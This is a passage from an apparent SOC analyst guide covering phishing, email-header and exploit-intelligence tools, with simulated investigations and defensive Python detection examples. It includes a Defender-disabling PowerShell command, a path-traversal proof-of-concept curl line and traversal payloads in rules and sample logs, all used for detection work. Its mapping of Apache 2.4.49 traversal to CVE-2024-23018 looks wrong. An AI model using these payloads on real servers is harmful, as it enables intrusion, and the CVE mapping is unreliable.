CommandLine | Set-MpPreference -DisableRealtimeMonitoring $true
ParentImage | [Link]
Splunk Detection:
• Alert fires within 10 seconds
• Linked to MITRE ATT&CK ID: T1562.001
Step 5: SOC Playbook Integration
• Playbook updated to include:
o Isolation check for the host
o Endpoint EDR validation
o Analyst review for potential post-exploitation
• Mapping logged in ATT&CK Workbench under Defender Evasion Patterns
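The conversion in Step 2 and the test in Step 4 come down to two operations on the rule's selection: rendering each `field|contains` list as a wildcard search, and evaluating the same list against an event. The block below is an added example, not SigmaHQ or sigmac code. It holds the page's defender_disable.yml as a Python dict (what PyYAML would load) so nothing beyond the standard library is needed; the "[Link]" placeholder item is left out, and the process_creation events are constructed.

```python
"""Convert the page's Sigma rule to a Splunk search and evaluate it locally.

Added example; not SigmaHQ or sigmac code. The rule is defender_disable.yml
held as a Python dict (what PyYAML would load). Only the `field|contains`
list form with `condition: selection` is handled, which is all this rule
uses. The process_creation events are constructed.
"""

RULE = {
    "title": "Windows Defender Disabling via Command Line",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "CommandLine|contains": [
                "Set-MpPreference",
                "-DisableRealtimeMonitoring",
                "-RemoveDefinitions",
            ]
        },
        "condition": "selection",
    },
    "level": "high",
    "tags": ["attack.defense_evasion", "attack.t1562.001"],
}

# Constructed Sysmon Event ID 1 records, reduced to the fields the rule reads.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe Get-Process | Sort-Object CPU -Descending"},
    {"Image": "C:\\Program Files\\Windows Defender\\MpCmdRun.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "MpCmdRun.exe -RemoveDefinitions -All"},
]


def _selection_terms(rule):
    """Yield (field, modifier, [values]) for each key in the selection."""
    detection = rule["detection"]
    if detection.get("condition") != "selection":
        raise ValueError("only 'condition: selection' is supported in this example")
    for key, values in detection["selection"].items():
        field, _, modifier = key.partition("|")
        if modifier != "contains":
            raise ValueError(f"unsupported modifier on {field}: {modifier or 'exact match'}")
        yield field, modifier, [values] if isinstance(values, str) else list(values)


def sigma_to_splunk(rule):
    """Render the selection as a Splunk search: values under one field are OR-ed,
    different fields are AND-ed, and 'contains' becomes a wildcard on both sides."""
    clauses = []
    for field, _, values in _selection_terms(rule):
        escaped = (v.replace("\\", "\\\\").replace('"', '\\"') for v in values)
        clauses.append(" OR ".join(f'{field}="*{v}*"' for v in escaped))
    return "(" + ") AND (".join(clauses) + ")"


def rule_matches(rule, event):
    """Sigma string matching is case-insensitive; apply the same semantics locally."""
    for field, _, values in _selection_terms(rule):
        haystack = str(event.get(field, "")).lower()
        if not any(v.lower() in haystack for v in values):
            return False
    return True


def matching_events(rule, events):
    return [e for e in events if rule_matches(rule, e)]


def attack_techniques(rule):
    """Technique IDs from tags such as attack.t1562.001 -> T1562.001."""
    return [t.split(".", 1)[1].upper() for t in rule.get("tags", [])
            if t.startswith("attack.t") and t[8:9].isdigit()]


if __name__ == "__main__":
    print(sigma_to_splunk(RULE))
    for hit in matching_events(RULE, SAMPLE_EVENTS):
        print("MATCH", attack_techniques(RULE), hit["CommandLine"])
```

Running the rule locally against a handful of known-good and known-bad events before deploying it is cheap, and here it also shows a tuning point: the `-RemoveDefinitions` term fires on MpCmdRun.exe as well as on PowerShell, so a production version would likely constrain `Image` or `ParentImage` as well.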
6. EMAIL HEADER AND PHISHING ANALYSIS
[Link]
[Link] is an email reputation and risk assessment API that analyses email addresses
for trustworthiness based on factors like domain age, breach history, deliverability and
malicious activity. It provides a fast and data-driven way to evaluate whether an email is
suspicious.
Use Cases:
• Validate sender email addresses during phishing or business email compromise
(BEC) investigations.
• Integrate with SOC platforms or phishing workflows to auto-flag risky email
addresses.
• Identify newly registered domains or emails involved in spam or scams.
• Check if an email has been seen in data breaches, spam traps or threat feeds.
Practical Application: A suspicious email is reported by an employee. The analyst
checks the sender’s email on [Link] and sees it has a “high-risk” score, is
associated with a recently registered domain and appears in multiple spam lists. The
incident is escalated as a targeted phishing attempt.
Scenario Simulation: Email Reputation Check Using [Link]
Context
Event Type: Phishing Email Report
Objective: Determine the trust level and risk profile of a suspicious email address
Tool: [Link]
Technique: Email Reputation Scoring, Domain Intelligence, Threat List Lookup
Step 1: Initial Trigger
A finance team employee receives a suspicious email from:
ceo-secure@[Link]
The email urges immediate action for wire transfer approval. The sender claims to be the
CEO using a different domain.
Step 2: Query [Link]
The analyst opens [Link] or uses the API:
curl [Link]
Response Output:
{
"email": "ceo-secure@[Link]",
"reputation": "high-risk",
"suspicious": true,
"references": 7,
"blacklisted": true,
"malicious_activity": true,
"domain_exists": true,
"domain_age_days": 3,
"new_domain": true,
"deliverable": true,
"credentials_leaked": false,
"data_breach": false,
"spam": true,
"spoofable": true,
"malicious": true,
"summary": [
"domain is newly registered",
"email seen in spam traps",
"associated with phishing attempts",
"blacklisted on multiple threat feeds"
]
}
Step 3: Analysis & Correlation
• Domain Age: 3 days old → suspicious for business impersonation
• Blacklisted: Confirmed on public spam threat feeds
• Spoofing Risk: SPF/DKIM records missing
• Malicious Flag: Set to true based on correlated behaviour and threat lists
Step 4: SOC Response Actions
• Analyst tags this as a BEC Attempt
• Email and domain added to blocklists in secure email gateway
• Email headers extracted and added to IOC tracking
• A case is created in the incident response platform
• Notification sent to the finance team to raise awareness of impersonation tactics
Step 5: Automation Recommendation
SOC recommends integrating [Link] into the phishing SOAR playbook:
• Automatically query sender addresses in user-reported suspicious emails
• Flag "new_domain + high-risk" combinations for escalation
• Add API score results to phishing triage enrichment
MXTOOLBOX
MXToolbox is a suite of tools that focuses on email and DNS infrastructure analysis. It
allows analysts to query email headers, verify SPF/DKIM/DMARC records, inspect
blacklists and test mail server configurations.
Use Cases:
• Parse and analyse full email headers to determine the actual sender and mail flow
path.
• Validate SPF, DKIM and DMARC configurations of sender domains to detect
spoofing.
• Check if a sender’s mail server IP is on known blacklists.
• Conduct WHOIS and DNS lookups on suspicious email domains.
Practical Application: A reported email claims to be from a partner company.
MXToolbox reveals that the domain fails SPF and DMARC checks and the IP is listed
on a spam blacklist. The analyst determines the email was spoofed and blocks the
domain at the gateway.
Scenario Simulation: Email Header and Domain Validation Using MXToolbox
Context
Event Type: Partner Email Spoofing Attempt
Tool: MXToolbox
Objective: Verify sender authenticity, inspect email header path, SPF/DKIM/DMARC status
and blacklist listings
Step 1: Suspicious Email Reported
A procurement staff member receives an email supposedly from:
finance@[Link]
Subject: “Urgent Invoice Update – New Bank Account”
Step 2: Extract and Analyse Email Header
The SOC analyst pastes the full header into MXToolbox’s Header Analyzer tool.
Output:
• Return-Path: finance@[Link]
• Received From: [Link] ([Link])
• SPF Check: Fail
• DKIM Check: Missing
• DMARC Policy: None
• Spam Score: High
Step 3: Validate Domain Infrastructure
Analyst runs the following checks:
• Blacklist Check: IP [Link] is listed on multiple spam DNSBLs
• SPF Lookup:
v=spf1 -all
The domain rejects all senders — yet the email passed through → spoofing confirmed
• DMARC:
No DMARC record found
Step 4: DNS & WHOIS Analysis
Using MXToolbox WHOIS & DNS tools:
• Domain [Link] is legitimate, but the email did not come from its
infrastructure
• WHOIS confirms original domain is registered to a real supplier
• DNS resolution shows the sending IP doesn't match authorised servers
Step 5: Analyst Action Plan
• Flag email as spoofed
• Add sender IP [Link] to blocklist
• Notify gateway administrator to enforce SPF/DKIM checks strictly
• Send alert to all users about ongoing vendor impersonation phishing
• Contact the legitimate supplier to inform them of the abuse of their domain
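The SPF conclusion in Step 3 (a record of `v=spf1 -all` authorises no sender at all, so a message that arrived from an unlisted IP is spoofed) is a mechanical check, and it helps to see how the evaluator reaches it. The following is an added example, not MXToolbox code. DNS is replaced by a constructed dictionary of TXT records so it runs offline; it supports the mechanisms an analyst meets most often (ip4, include, all with its qualifier) and treats anything else as unsupported.

```python
"""Evaluate an SPF record for a sending IP, offline.

Added example; not MXToolbox code. DNS answers come from a constructed dict
so the check runs without network access, and the records themselves are
made up. Supported mechanisms: ip4, include, and all with its qualifier.
"""
import ipaddress

# Constructed TXT records standing in for DNS answers.
FAKE_DNS = {
    "supplier.example": "v=spf1 -all",
    "partner.example": "v=spf1 ip4:203.0.113.0/24 include:mailer.example -all",
    "mailer.example": "v=spf1 ip4:198.51.100.10 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_INCLUDE_DEPTH = 10  # RFC 7208 caps DNS-querying mechanisms at 10


def check_spf(domain, sender_ip, dns=FAKE_DNS, depth=0):
    """Return one of pass/fail/softfail/neutral/none/permerror for sender_ip."""
    if depth > MAX_INCLUDE_DEPTH:
        return "permerror"
    record = dns.get(domain.lower())
    if record is None or not record.lower().startswith("v=spf1"):
        return "none"           # no SPF published: nothing can be concluded
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.lower().partition(":")
        if name == "all":
            return QUALIFIERS[qualifier]
        if name == "ip4":
            if ip in ipaddress.ip_network(arg, strict=False):
                return QUALIFIERS[qualifier]
        elif name == "include":
            # include matches only when the referenced domain yields pass
            if check_spf(arg, sender_ip, dns, depth + 1) == "pass":
                return QUALIFIERS[qualifier]
        # a, mx, exists and ptr are not implemented in this example
    return "neutral"            # record ended without an all mechanism


def spoofing_suspected(domain, sender_ip, dns=FAKE_DNS):
    """A fail from the purported sender domain is the condition used in Step 3."""
    return check_spf(domain, sender_ip, dns) == "fail"


if __name__ == "__main__":
    for dom, ip in [("supplier.example", "198.51.100.77"),
                    ("partner.example", "203.0.113.45"),
                    ("partner.example", "198.51.100.10"),
                    ("partner.example", "192.0.2.1")]:
        print(dom, ip, check_spf(dom, ip), "spoofed" if spoofing_suspected(dom, ip) else "")
```

A `fail` here corresponds to the "SPF Check: Fail" line in the header analyser output; `softfail` and `neutral` are weaker signals that a gateway usually only scores rather than rejects, which is why DMARC alignment is checked alongside SPF.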
HAVEIBEENPWNED
HaveIBeenPwned (HIBP) is a data breach notification and lookup service that allows users
to check whether their email address or password has been exposed in known breaches.
Use Cases:
• Check whether a compromised email was involved in past breaches.
• Identify reuse of passwords across breached accounts.
• Detect if internal or executive emails are circulating in dark web dumps.
• Proactively monitor corporate domains for breach exposure.
Practical Application: A VIP user account is targeted in a credential stuffing attack.
The analyst checks HIBP and confirms the user’s email was involved in two breaches.
They enforce a password reset and initiate MFA rollout for all affected accounts.
Scenario Simulation: VIP Email Compromise Check Using HaveIBeenPwned (HIBP)
Context
Event Type: Credential Stuffing on Executive Account
Tool: HaveIBeenPwned
Objective: Check if executive emails have been leaked in public data breaches
Step 1: Incident Detection
A brute-force alert is triggered on the login page of the company’s executive portal.
Targeted Email: ceo@[Link]
Alert Source: SIEM (correlated multiple failed login attempts from foreign IPs)
Step 2: Analyst Uses HaveIBeenPwned
The SOC analyst navigates to the HIBP search page and enters the email address:
ceo@[Link]
Output:
Oh no — pwned!
This email was found in 2 breaches:
• LinkedIn 2016: Email + SHA1 password
• Collection #1: Email + plain text password
Step 3: Evaluate Risk
The attacker may have retrieved credentials from the above dumps and used them in a
credential stuffing campaign.
• User reused the same password for multiple services
• MFA was not enforced for the executive account
• The attacker has valid old credentials and is attempting to reuse them
Step 4: Analyst Response Actions
1. Force password reset for ceo@[Link]
2. Enforce MFA across all executive accounts
3. Search SIEM logs for any successful logins from suspicious locations
4. Implement IP block rules for known malicious IPs used in the attack
5. Add ceo@[Link] to continuous monitoring list in HIBP’s API
Step 5: Preventive Measures
• Use HaveIBeenPwned’s Domain Search feature to monitor all emails under
@[Link]
• Enable notifications for future breach detections
• Conduct executive security awareness briefing about password reuse risks
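HIBP also covers the password side of the check described above, and the interesting part is how a password can be checked without sending it (or its full hash) to the service. The block below is an added example, not HIBP's code, and goes beyond the email lookup in the scenario: it implements the Pwned Passwords k-anonymity range lookup offline. The real API call is `GET https://api.pwnedpasswords.com/range/<first 5 hex characters of the SHA-1>`, which returns lines of `<remaining 35 hex characters>:<count>`. The response body here is constructed; the only real value in it is the SHA-1 suffix of the string "password".

```python
"""Pwned Passwords range lookup with k-anonymity, shown offline.

Added example; not HIBP's code. Only the 5-character SHA-1 prefix ever leaves
the client; the response lists every breached hash sharing that prefix and
the client compares suffixes locally. The range response below is constructed
(counts and the other suffixes are invented).
"""
import hashlib

# Constructed stand-in for the HTTP body returned for /range/5BAA6.
FAKE_RANGE_RESPONSES = {
    "5BAA6": "\r\n".join([
        "003D68EB55068C33ACE09247EE4C639306B:3",
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:9545824",
        "1F1ACC1EC4DB3B9C8A5A3F1EAB6B4C1CD84:1",
    ]),
}


def sha1_prefix_suffix(password):
    """Split the upper-case hex SHA-1 into the 5-char prefix sent and the 35-char suffix kept."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range(prefix, responses=FAKE_RANGE_RESPONSES):
    """Stand-in for the HTTPS request; returns the body, or '' for an unknown prefix."""
    return responses.get(prefix, "")


def parse_range(body):
    """Map each 35-char suffix to its breach count."""
    counts = {}
    for line in body.splitlines():
        suffix, _, count = line.strip().partition(":")
        if suffix and count.isdigit():
            counts[suffix] = int(count)
    return counts


def pwned_count(password, responses=FAKE_RANGE_RESPONSES):
    """How many times the password appears in the breach corpus (0 = not found)."""
    prefix, suffix = sha1_prefix_suffix(password)
    return parse_range(fetch_range(prefix, responses)).get(suffix, 0)


def password_allowed(password, responses=FAKE_RANGE_RESPONSES, threshold=1):
    """Policy hook: reject anything seen at least `threshold` times."""
    return pwned_count(password, responses) < threshold


if __name__ == "__main__":
    for candidate in ["password", "correct horse battery staple"]:
        print(candidate, pwned_count(candidate), password_allowed(candidate))
```

Because only a prefix is transmitted, the service cannot tell which of the roughly several hundred hashes in the bucket the client was interested in, which is what makes the check safe to wire into a password-reset flow such as the one in Step 4.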
PHISHTOOL
PhishTool is a phishing investigation and automation platform that helps SOC analysts
analyse suspicious emails, headers and attachments. It uses visual parsing, metadata
extraction and external threat intelligence to streamline triage.
Use Cases:
• Investigate suspected phishing emails with deep analysis of headers, body content
and metadata.
• Extract URLs, attachments and IOCs for deeper sandboxing or threat intel
enrichment.
• Use scoring and risk indicators to prioritise email threats.
• Automate email triage workflows and integrate with SOAR platforms.
Practical Application: A user submits a suspicious email to the SOC. PhishTool parses
the email, highlights anomalous return paths, extracts a shortened URL and shows
the domain is newly registered. It also links the sample to a known phishing
campaign, prompting an immediate block.
Scenario Simulation: Email Threat Analysis Using PhishTool
Context
Tool: PhishTool
Objective: Analyse a user-reported email for phishing indicators
Environment: SOC workflow integration with email gateway and threat intel feeds
Step 1: Email Reported by Employee
The IT Helpdesk receives a reported email flagged by a user as suspicious.
Subject: Urgent: Verify your payroll details
Sender: payroll@[Link]
Received via: outbound@[Link]
Step 2: Email Ingested into PhishTool
The email is automatically or manually ingested into PhishTool for analysis.
PhishTool parses:
• Full email headers
• Body content
• Attachments (if any)
• Embedded URLs
Step 3: PhishTool Analysis Results
Element | Result
SPF | FAIL – not authorised by sending domain
DKIM | FAIL – invalid signature
DMARC | FAIL – no policy defined
Return Path | Suspicious – return path mismatched (support@secure-[Link])
URL | Shortened link hxxps://[Link]/3XyzABC
Final Redirect | hxxps://secure-payroll-update[.]com/login
Domain Age | Registered 2 days ago
Reputation Check | Blacklisted on 2 open threat feeds
Campaign Correlation | Matches IOC from Feb 2025 payroll phishing campaign
Attachment | None
Risk Score (PhishTool) | High – confirmed phishing
Step 4: SOC Analyst Actions Based on Output
1. Block domain secure-payroll-update[.]com on all perimeter devices
2. Submit shortened URL and redirect to Hybrid Analysis
3. Search SIEM logs for clicks to the phishing domain
4. Notify affected users and trigger phishing awareness alert
5. Update SOAR/IR playbooks with the new indicators
6. Feed IOC into Threat Intelligence Platform (TIP)
Step 5: Integration with SOAR
PhishTool sends extracted indicators and verdict via API:
{
"email_subject": "Urgent: Verify your payroll details",
"malicious_domain": "[Link]",
"first_seen": "2025-08-01",
"risk_score": "High",
"related_campaign": "Payroll Phishing Q1 2025",
"action_taken": [
"Domain blocked",
"URL submitted to sandbox",
"User awareness initiated"
]
}
[Link]
[Link] is a simple tool used to parse raw email headers. It decodes header lines
and presents sender path, SPF/DKIM results, delays and originating IPs in an easy-to-
understand format.
Use Cases:
• Quickly analyse email headers for spoofing, redirection or forwarding issues.
• Identify the true source IP of an email, even if the sender domain is spoofed.
• Validate DKIM/SPF alignment to determine if the email was tampered with.
• Visualise hop-by-hop relay data to trace email delivery.
Practical Application: A spoofed internal email bypasses spam filters. The analyst
uses [Link] to parse the raw header and discovers that the return-path and
SPF validation failed. The originating IP is traced back to a foreign VPS service. The
domain is reported and blocked.
Scenario Simulation: Investigating Email Spoofing Using [Link]
Context
Objective: Investigate a suspected spoofed internal email and validate whether proper
sender authentication mechanisms (SPF, DKIM, DMARC) were bypassed.
Tool: [Link]
Environment:
• Email client: Microsoft Outlook
• Email security gateway: Microsoft Defender for Office 365
• Analyst platform: Browser + internal IOC tracker
• Email source: User-reported phishing email claiming to be from internal finance
team
Step 1: Email Header Collection and Pre-Check
Trigger:
A user from the finance team reports an unusual email from finance@[Link]
requesting immediate transfer approval.
Action Taken:
SOC analyst requests the full raw email header from the user’s Outlook client.
Header Collected:
Return-Path: <finance@[Link]>
Received: from [Link] [[Link]]
by [Link] with ESMTP id 192F812398
for <salinah@[Link]>; Tue, 5 Aug 2025 08:45:02 +0800
Received-SPF: Fail ([Link]: domain of finance@[Link] does not
designate [Link] as permitted sender)
Authentication-Results: spf=fail [Link]=[Link];
dkim=none;
dmarc=fail [Link]=[Link];
From: finance@[Link]
To: salinah@[Link]
Subject: Urgent – Transfer Authorisation Needed
Date: Tue, 5 Aug 2025 08:44:59 +0800
Message-ID: <2234abcxyz@[Link]>
Step 2: Parsing Email Header with [Link]
Procedure:
1. Analyst accesses [Link]
2. Pastes the entire raw email header into the analysis window.
3. Clicks Analyse and reviews the decoded output.
[Link] Output:
Field | Value
SPF Result | Fail
DKIM | None Detected
DMARC | Fail
Sender IP | [Link]
GeoIP | Netherlands (VPS Provider)
Relay Chain | Unusual hop from [Link]
Return-Path | finance@[Link]
Authentication Result | Message fails all email authentication checks
Observations:
• SPF and DMARC failed.
• DKIM signature missing.
• IP address is not authorised by domain [Link].
• Message appears spoofed and unauthenticated.
• Originating IP from a VPS provider known for abuse.
Step 3: Validation and Threat Investigation
IOC Extraction:
IOC Type | Value
Source IP | [Link]
Spoofed Domain | [Link]
Message-ID | 2234abcxyz@[Link]
Return Path | finance@[Link]
Enrichment Actions:
• IP [Link] is searched in AbuseIPDB → Flagged as high-abuse
• WHOIS lookup for sending server → Registered recently, associated with multiple
spam complaints
• Domain [Link] in Message-ID shows malicious historical behaviour in
internal threat intel
Step 4: Response and SOC Workflow Enhancement
Actions Taken:
• IP [Link] blocked on the email gateway and perimeter firewall.
• Domain [Link] added to internal denylist.
• Email marked as Confirmed Phishing in ticketing system.
• Analyst updates SIEM use case to alert on:
o Internal domain spoofing
o SPF/DKIM/DMARC failure from high-risk VPS sources
Custom Detection Rule Logic (KQL / SIEM DSL Example):
email.from_domain == "[Link]" AND
([Link] == "fail" OR [Link] == "none" OR [Link] == "fail") AND
[Link] != "Malaysia"
Step 5: Documentation and Playbook Mapping
Playbook Updated:
• SOP for email header parsing includes use of [Link]
• Quick response checklist added for spoofed internal domains
• Internal threat intelligence database updated with observed IOCs
Training Outcome:
• Junior analysts briefed on how to triage raw headers and use external tools like
[Link]
• New detection rule created and validated in production
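Everything the analyst reads off the parsed header in Step 2, and the three-part rule in Step 4, can be reproduced with the standard library, which is useful when a header arrives in a ticket and the web tool is not an option. The block below is an added example, not [Link]'s code. The raw header is constructed to match the shape of the one collected above (documentation-range IP and example domains), the GeoIP lookup is a constructed table, and the internal domain is an assumption.

```python
"""Parse a raw email header and apply the internal-spoofing rule from Step 4.

Added example; not [Link]'s code. Extracts the originating IP from the
earliest Received hop, the SPF/DKIM/DMARC verdicts from Authentication-Results,
and the From, Return-Path and Message-ID domains, then evaluates the rule:
internal From domain AND an authentication failure AND a non-home origin.
The header, GeoIP table and internal domain are constructed/assumed.
"""
import re
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAIN = "corp.example"                # assumption for the example
HOME_COUNTRY = "Malaysia"                       # as in the rule above
FAKE_GEOIP = {"198.51.100.23": "Netherlands"}   # constructed GeoIP answer

# Constructed raw header; folded continuation lines are kept as a client pastes them.
RAW_HEADER = """Return-Path: <finance@corp.example>
Received: from mail.vps-host.example [198.51.100.23]
 by mx.corp.example with ESMTP id 192F812398
 for <salinah@corp.example>; Tue, 5 Aug 2025 08:45:02 +0800
Received-SPF: Fail (mx.corp.example: domain of finance@corp.example does not
 designate 198.51.100.23 as permitted sender)
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=corp.example;
 dkim=none;
 dmarc=fail header.from=corp.example;
From: finance@corp.example
To: salinah@corp.example
Subject: Urgent - Transfer Authorisation Needed
Date: Tue, 5 Aug 2025 08:44:59 +0800
Message-ID: <2234abcxyz@mail.vps-host.example>
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=([a-z]+)", re.I)


def _domain(address):
    return address.rpartition("@")[2].lower()


def parse_header(raw):
    msg = message_from_string(raw)
    # Each relay prepends its own Received header, so the last one is the first hop.
    origin_ip = None
    for hop in reversed(msg.get_all("Received") or []):
        found = IP_RE.search(hop)
        if found:
            origin_ip = found.group(1)
            break
    auth = {k.lower(): v.lower()
            for k, v in AUTH_RE.findall(msg.get("Authentication-Results", ""))}
    return {
        "from_domain": _domain(parseaddr(msg.get("From", ""))[1]),
        "return_path_domain": _domain(parseaddr(msg.get("Return-Path", ""))[1]),
        "message_id_domain": _domain((msg.get("Message-ID") or "").strip().strip("<>")),
        "origin_ip": origin_ip,
        "spf": auth.get("spf", "none"),
        "dkim": auth.get("dkim", "none"),
        "dmarc": auth.get("dmarc", "none"),
    }


def spoof_rule(parsed, internal_domain=INTERNAL_DOMAIN,
               home_country=HOME_COUNTRY, geoip=FAKE_GEOIP):
    """Mirror of the SIEM logic in Step 4."""
    auth_failed = (parsed["spf"] == "fail" or parsed["dkim"] == "none"
                   or parsed["dmarc"] == "fail")
    country = geoip.get(parsed["origin_ip"], "unknown")
    return (parsed["from_domain"] == internal_domain and auth_failed
            and country != home_country)


def extract_iocs(parsed):
    """IOCs for the tracker, defanged so they cannot be clicked in a ticket."""
    def defang(value):
        return value.replace(".", "[.]") if value else value
    return {"source_ip": defang(parsed["origin_ip"]),
            "message_id_domain": defang(parsed["message_id_domain"]),
            "spoofed_domain": defang(parsed["from_domain"])}


if __name__ == "__main__":
    result = parse_header(RAW_HEADER)
    print(result)
    print("spoofed:", spoof_rule(result), extract_iocs(result))
```

Note that an unknown origin IP is treated as outside the home country, so a message with no GeoIP answer still trips the rule; that is the conservative choice for an internal-domain spoof, where a false negative costs more than an extra triage ticket.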
7. CVE, EXPLOIT AND VULNERABILITY INTELLIGENCE
EXPLOIT-DB
Exploit Database (Exploit-DB) is a publicly accessible archive of exploits and proof-of-
concept (PoC) code for known vulnerabilities. Maintained by Offensive Security, it includes
local and remote exploits, shellcodes and advisories, mapped to CVEs when available.
Use Cases:
• Research known exploits associated with a CVE to assess risk and possible attack
vectors.
• Use PoC code for testing detection capabilities in a lab environment.
• Investigate real-world exploitability of vulnerabilities found in your environment.
• Track trends in exploit techniques used by attackers.
Practical Application: After identifying a critical vulnerability (CVE-2024-XXXX)
affecting a legacy Apache server, the analyst checks Exploit-DB and finds public PoC
code for remote code execution. The threat level is escalated and emergency
patching is initiated.
Scenario Simulation: Vulnerability Analysis and Threat Validation Using Exploit-DB
Context
Objective: Assess the exploitability of a disclosed Apache vulnerability (CVE-2024-23018)
and validate whether it has public exploit code for potential weaponisation.
Tool: Exploit Database (Exploit-DB)
Environment:
• Target: Internal legacy Apache HTTPD 2.4.49 server
• Platform: Ubuntu 20.04 (Dev Environment)
• Security Monitoring: Suricata IDS + Sysmon + Wazuh + ELK Stack
• Patch Management Team on standby
Step 1: Vulnerability Discovery and Initial Assessment
Trigger:
A weekly vulnerability scan detects a critical vulnerability in an outdated Apache server:
• CVE ID: CVE-2024-23018
• Severity: CVSS 9.8 (Critical)
• Summary: Path traversal vulnerability allowing unauthenticated remote code
execution
Initial Research:
• Analyst checks NVD, which confirms the CVE has a critical score but no detailed
remediation info.
• The next step is to validate exploit availability and severity in the wild.
Step 2: Checking Exploit Availability on Exploit-DB
Procedure:
1. Go to [Link]
2. Use the search bar and enter:
CVE-2024-23018
3. Review the top entry:
Exploit Entry Found:
Field | Value
Exploit Title | Apache HTTP Server 2.4.49 - Remote Code Execution (Path Traversal)
Date | 2024-05-15
Type | Remote
Platform | Linux
Download Link | [Link]
Verified | Yes
Author | Anonymous researcher
PoC Script Overview:
curl -v --path-as-is [Link] -d "echo; id"
Step 3: Lab Testing and Detection Validation
Controlled Lab Setup:
• Apache 2.4.49 deployed on Ubuntu VM in isolated lab
• Exploit script executed from attacker VM
• Detection systems: Suricata IDS (rules updated), Wazuh + ELK
Observables Detected:
Source | Alert/Event | Details
Suricata | ET WEB_SERVER Apache Path Traversal | Signature triggered
Sysmon | Process Create (bash) | Shell spawned via Apache
ELK Stack | Anomalous HTTP request | Encoded traversal pattern logged
KQL Query (Wazuh ELK):
[Link].uri_path: "*%2e%2e*" AND [Link].status_code: 200
Initial Outcome:
Alert triggered, but no correlation to CVE or MITRE technique in existing rules.
Step 4: Response and Mitigation
Actions Taken:
• Vulnerability escalated to IT for emergency patching
• WAF updated to block encoded traversal patterns
• Exploit signature from Exploit-DB transformed into custom Suricata rule:
alert http any any -> any any (msg:"Apache RCE CVE-2024-23018 Exploit Attempt";
content:"/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"; http_uri; sid:9999999;)
• Exploit PoC saved to internal red team testbed for detection tuning
Step 5: Documentation and Threat Mapping
MITRE Mapping:
Technique ID | Technique Name | Notes
T1190 | Exploit Public-Facing Application | Exploit enabled unauthenticated RCE via Apache
T1059.004 | Command and Scripting Interpreter: Unix Shell | Shell execution through crafted HTTP request
Playbook Update:
• Added process for cross-checking CVEs with Exploit-DB
• Included new detection logic in Wazuh SIEM correlation rules
• Patch prioritisation now includes "Exploit-Available" tag from Exploit-DB
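The KQL query in Step 3 and the Suricata content match in Step 4 both key on one literal encoding of the traversal sequence, and a request encoded differently (`.%2e`, `%252e`, a backslash) slips past a literal match. The following is an added example, not Suricata, Wazuh or Exploit-DB code: a detector that decodes the request path until it stops changing, normalises separators, and flags any request whose decoded path still contains a `..` segment, escalating when the server answered 2xx. The access log lines are constructed in Apache combined format.

```python
"""Detect encoded path-traversal attempts in web server access logs.

Added example; not Suricata or Wazuh code. Percent-decodes each request path
repeatedly (to defeat double encoding), treats backslashes as separators, and
flags any path that still contains a '..' segment. A 2xx response to such a
request is escalated, since it means the server served the traversal.
The log lines are constructed.
"""
import re
from urllib.parse import unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Constructed access log: two encoded traversals, one benign request, one literal traversal.
SAMPLE_LOG = """\
203.0.113.9 - - [05/Aug/2025:10:12:01 +0800] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 27
203.0.113.9 - - [05/Aug/2025:10:12:05 +0800] "GET /icons/..%252f..%252fetc/passwd HTTP/1.1" 404 196
198.51.100.4 - - [05/Aug/2025:10:13:40 +0800] "GET /index.html HTTP/1.1" 200 1024
198.51.100.4 - - [05/Aug/2025:10:14:02 +0800] "GET /docs/../../ HTTP/1.1" 400 0
"""


def fully_decode(path, max_rounds=5):
    """Percent-decode until the string stops changing (bounded, so %25 chains terminate)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_traversal(path):
    """True when the decoded, normalised path contains a '..' segment."""
    decoded = fully_decode(path).replace("\\", "/")
    path_only = decoded.split("?", 1)[0]
    return any(segment == ".." for segment in path_only.split("/"))


def parse_log(text):
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match:
            yield match.groupdict()


def traversal_alerts(text):
    alerts = []
    for rec in parse_log(text):
        if not is_traversal(rec["path"]):
            continue
        status = int(rec["status"])
        alerts.append({
            "src_ip": rec["ip"],
            "raw_path": rec["path"],
            "decoded_path": fully_decode(rec["path"]),
            "status": status,
            "severity": "high" if 200 <= status < 300 else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in traversal_alerts(SAMPLE_LOG):
        print(alert["severity"], alert["src_ip"], alert["decoded_path"], alert["status"])
```

The same decode-then-match step is what a WAF or IDS normaliser does before applying a signature; writing the SIEM rule against the decoded path (or keeping a detector like this beside the literal rule) closes the gap that the "Initial Outcome" in Step 3 describes.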
CVE DETAILS
CVE Details is an indexed database that provides detailed information about known
Common Vulnerabilities and Exposures (CVEs). It allows users to search vulnerabilities by
product, vendor, CVSS score, publication date and more.
Use Cases:
• Perform impact assessment for software vulnerabilities across vendors and
versions.
• Check the history of vulnerabilities affecting a product.
• Identify which versions of a software component are vulnerable.
